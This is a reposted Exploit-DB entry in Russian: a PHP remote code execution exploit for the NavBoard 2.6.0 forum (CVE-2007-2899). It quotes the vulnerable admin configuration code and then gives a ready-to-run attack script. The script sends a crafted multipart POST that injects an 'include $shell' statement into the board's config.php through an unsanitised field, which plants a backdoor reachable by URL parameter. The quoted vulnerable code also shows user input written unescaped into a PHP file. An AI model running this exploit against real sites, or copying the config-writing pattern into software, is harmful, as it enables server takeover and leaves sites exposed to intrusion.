- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3971
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2899
- Дата публикации
- 2007-05-23
PHP:
<?php
/*
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : NavBoard 2.6.0
[!] Download : http://www.sourceforge.net/projects/navboard
[!] Type : Remote Code Execution Exploit
---------------------------------------------------------------------
*/
/*
Vuln Code :
[Code]
if(!$editconfig){
tableheader1();
print "<form action=\"admin_config.php\" method=post>";
print "<input type=hidden name=\"editconfig\" value=\"1\" size=40>";
print "<tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Main forum settings</b>";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Board Title";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"boardtitle\" value=\"$configarray[0]\" size=40 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Admin email address (blank will not display)";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"adminemail\" value=\"$configarray[35]\" size=40 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Main website address (NOT forum address, blank will display forum address)";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"mainwebsite\" value=\"$configarray[36]\" size=40 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Display text title instead of graphic logo for faster loading<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[34]=="on")
{print "<input type=checkbox name=\"textlogo\" class=\"forminput\" checked>";}
else{print "<input type=checkbox name=\"textlogo\" class=\"forminput\">";}
print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Forums</b><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max levels of subforums to display on one page (less will make for faster loading)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxsubforumdisplay\" value=\"$configarray[27]\" size=2 class=\"forminput\">";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Don't find forum reply count on the fly, recount during posting<br>(faster forum page, may slow posting slightly)";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[42]=="on"){
print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\" checked>";
}else{print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\">";}
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Forum/Thread indenting amount<br>Percentage of title cell used for indent spaing";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"indentspacing\" value=\"$configarray[44]\" size=2 class=\"forminput\">%";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Posts</b><br>";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Seconds before user may add another post (flood control)";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"postfloodcontrolsec\" value=\"$configarray[37]\" size=2 class=\"forminput\">";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Amount of nested bbcodes allowed<br>(how many times a bbcode tag can be put over itself) 3 is default";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"nestedbbcodes\" value=\"$configarray[43]\" size=2 class=\"forminput\">";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Show names for user levels instead of imageicons:<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[45]=="on"){
print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\" checked>";
}else{
print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\">";
}
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Show all edits instead of only last edit on posts<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[46]=="on"){
print "<input type=checkbox name=\"showalledits\" class=\"forminput\" checked>";
}else{
print "<input type=checkbox name=\"showalledits\" class=\"forminput\">";
}
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Registration</b><br>";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Seconds before another account can be registered (flood control)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"regfloodcontrolsec\" value=\"$configarray[38]\" size=2 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Method of registration<br>";
print "NOTE: Mailing in php must be setup correctly on your server to work with email confirmation";
print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
if($configarray[39]=="on"||$configarray[39]==""){
print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\"> ";
}
print "Allowed<br>";
if($configarray[39]=="confirm"){
print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\"> ";
}
print "Email confirmed<br>";
if($configarray[39]=="approve"){
print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\"> ";
}
print "Admin approved";
print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Profiles</b>";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Allow duplicate display names<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[32]=="on"){
print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\" checked>";
}else{
print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\">";
}
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Display name changing<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
if($configarray[41]=="off"){
print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\"> ";
}
print "Not allowed<br>";
if($configarray[41]=="on"||$configarray[41]==""){
print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\"> ";
}
print "Allowed<br>";
if($configarray[41]=="approve"){
print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\" checked> ";
}else{
print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\"> ";
}
print "Admin approved";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Default time format (php <a href=\"http://www.php.net/manual/en/function.date.php\" target=\"_new\">date</a> format) ";
print "Recommended: n-j-Y h:iA <br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"defaulttime\" value=\"$configarray[33]\" size=40 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max people on individual users buddy lists";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"buddylistmax\" value=\"$configarray[28]\" size=2 class=\"forminput\">";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Avatars</b><br>";
print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Avatar file size limit (bytes)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"avatarfilesize\" value=\"$configarray[9]\" size=20 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Avatar dimensions limit (height)x(width)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"avatardimension\" value=\"$configarray[10]\" size=20 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Attachments</b>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Allowed attachment extensions (separated by commas) (blank would allow no attachments)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"allowedattachext\" value=\"$configarray[22]\" size=40 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max size of attachments (in bytes)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxattachsize\" value=\"$configarray[23]\" size=20 class=\"forminput\">";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total size of all attachments (in bytes)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxtotalattachsize\" value=\"$configarray[31]\" size=20 class=\"forminput\">";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Polls</b>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max poll options<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxpolloptions\" value=\"$configarray[24]\" size=2 class=\"forminput\">";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Theme</b><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Default theme<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
$themesarray=listdirs("themes");
print "<select size=1 name=\"defaulttheme\" size=40 class=\"forminput\">\n";
for($n=0;$n<count($themesarray);$n++){
if($themesarray[$n]==$configarray[12]){
print "<option value=\"$themesarray[$n]\" selected>$themesarray[$n]</option>";
}else{
print "<option value=\"$themesarray[$n]\">$themesarray[$n]</option>";
}
}
print "</select>";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Online users</b><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Seconds of inactivity before user is removed from online list (300seconds=5minutes)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"inactivityseconds\" value=\"$configarray[13]\" size=2 class=\"forminput\">";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Page settings</b>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Threads to show per page in forum<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"threadperpage\" value=\"$configarray[7]\" size=2 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Posts to show per page in thread<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"postperpage\" value=\"$configarray[8]\" size=2 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Max character settings</b><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total characters in body of posts<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxcharsbody\" value=\"$configarray[18]\" size=5 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total characters in subject of posts<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxcharssubject\" value=\"$configarray[25]\" size=5 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total characters in signatures<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxcharssigs\" value=\"$configarray[19]\" size=5 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Enabling/Disabling</b>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Allow HTML in posts:<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[14]=="allowhtml"){
print "<input type=checkbox name=\"html\" class=\"forminput\" checked>";
}else{
print "<input type=checkbox name=\"html\" class=\"forminput\">";
}
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Enable GZ Compression:<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
if($configarray[21]=="disablegz"){
print "<input type=checkbox name=\"gzcompress\" class=\"forminput\">";
}else{
print "<input type=checkbox name=\"gzcompress\" class=\"forminput\" checked>";
}
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Private Messaging</b><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total size of pms per user (bytes)<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxpmsize\" value=\"$configarray[29]\" size=10 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Max total number of pms per user<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"maxpmnumber\" value=\"$configarray[30]\" size=10 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
print "<b>Board Closing</b>";
print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
print "Entering info here will cause the entire bulletin board to be closed<br>";
print "This is the message that shows up when the board is closed<br>";
print "</span></td><td class=\"tablecell2\" width=\"50%\">";
print "<input type=text name=\"boardclosing\" value=\"$configarray[40]\" size=60 class=\"forminput\"><br>";
print "</td></tr><tr><td class=\"tablecell2\" colspan=\"2\"><span class=\"textlarge\">";
print "<input type=submit name=\"submit\" value=\"Update\" class=\"formbutton\">";
print "</span>";
print "</td>";
print "</form>";
print "</tr>";
print "</table>";
}
if($editconfig){
$boardtitle=stripslashes($boardtitle);
$boardtitle=htmlentities($boardtitle);
writedata("$maindatadir/config.php",$boardtitle,0);
writedata("$maindatadir/config.php",$threadperpage,7);
writedata("$maindatadir/config.php",$postperpage,8);
writedata("$maindatadir/config.php",$avatarfilesize,9);
writedata("$maindatadir/config.php",$avatardimension,10);
writedata("$maindatadir/config.php",$defaulttheme,12);
writedata("$maindatadir/config.php",$inactivityseconds,13);
if($html=="on"){
writedata("$maindatadir/config.php","allowhtml",14);
}else{
writedata("$maindatadir/config.php","denyhtml",14);
}
writedata("$maindatadir/config.php",$maxcharsbody,18);
writedata("$maindatadir/config.php",$maxcharssigs,19);
if($gzcompress=="on"){
writedata("$maindatadir/config.php","enablegz",21);
}else{
writedata("$maindatadir/config.php","disablegz",21);
}
writedata("$maindatadir/config.php",$allowedattachext,22);
writedata("$maindatadir/config.php",$maxattachsize,23);
writedata("$maindatadir/config.php",$maxpolloptions,24);
writedata("$maindatadir/config.php",$maxcharssubject,25);
writedata("$maindatadir/config.php",$maxsubforumdisplay,27);
writedata("$maindatadir/config.php",$buddylistmax,28);
writedata("$maindatadir/config.php",$maxpmsize,29);
writedata("$maindatadir/config.php",$maxpmnumber,30);
writedata("$maindatadir/config.php",$maxtotalattachsize,31);
writedata("$maindatadir/config.php",$allowdupdisplay,32);
writedata("$maindatadir/config.php",$defaulttime,33);
writedata("$maindatadir/config.php",$textlogo,34);
writedata("$maindatadir/config.php",$adminemail,35);
writedata("$maindatadir/config.php",$mainwebsite,36);
writedata("$maindatadir/config.php",$postfloodcontrolsec,37);
writedata("$maindatadir/config.php",$regfloodcontrolsec,38);
writedata("$maindatadir/config.php",$registration,39);
writedata("$maindatadir/config.php",$boardclosing,40);
writedata("$maindatadir/config.php",$displaychange,41);
if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount
for($n=0;$n<count($forumarray);$n++){
$topicarray=listdirs("$configarray[2]/$forumarray[$n]");
$replies=0;
for($m=0;$m<count($topicarray);$m++){
$postarray2=listfiles("$configarray[2]/$forumarray[$n]/$topicarray[$m]");
$replies+=count($postarray2)-1;
}
writedata("$configarray[2]/$forumarray[$n].php",$replies,11);
}
writedata("$maindatadir/config.php",$dontscanreplycount,42);
}else{
writedata("$maindatadir/config.php",$dontscanreplycount,42);
}
writedata("$maindatadir/config.php",$nestedbbcodes,43);
writedata("$maindatadir/config.php",$indentspacing,44);
writedata("$maindatadir/config.php",$userlevelnames,45);
writedata("$maindatadir/config.php",$showalledits,46);
if ($argc<2) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' Host Path Options
host: Target server (ip/hostname)
path: Path To Folder
Options:
-p[port]: specify a port other than 80
-P[iport]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /Forum/ -P1.1.1.1:80
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
/*Data*/
$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="editconfig"
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardtitle"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="threadperpage"
www\";include \"\$shell\";\/\/
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postperpage"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatarfilesize"
11
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatardimension"
123
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttheme"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="inactivityseconds"
#CCFF00
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="html"
on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharsbody"
111
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssigs"
11122
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="gzcompress"
on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowedattachext"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxattachsize"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpolloptions"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssubject"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxsubforumdisplay"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="buddylistmax"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmsize"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmnumber"
Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxtotalattachsize"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowdupdisplay"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttime"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="textlogo"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="adminemail"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="mainwebsite"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postfloodcontrolsec"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="regfloodcontrolsec"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="registration"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardclosing"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="displaychange"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="replies"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="dontscanreplycount"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="nestedbbcodes"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="indentspacing"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="userlevelnames"
red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="showalledits"
red
-----------------------------7d6224c08dc
';
/*Echo Header*/
echo "[!] NavBoard 2.6.0\r\n";
echo "[!] Powered By Y! Underground Group\r\n";
echo "[!] Vuln And Coded By Dj7xpl\r\n";
/*Sending Data*/
$packet ="POST ".$path."admin_config.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(2);
Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n";
?>
# milw0rm.com [2007-05-23][/CODE]
- Источник
- www.exploit-db.com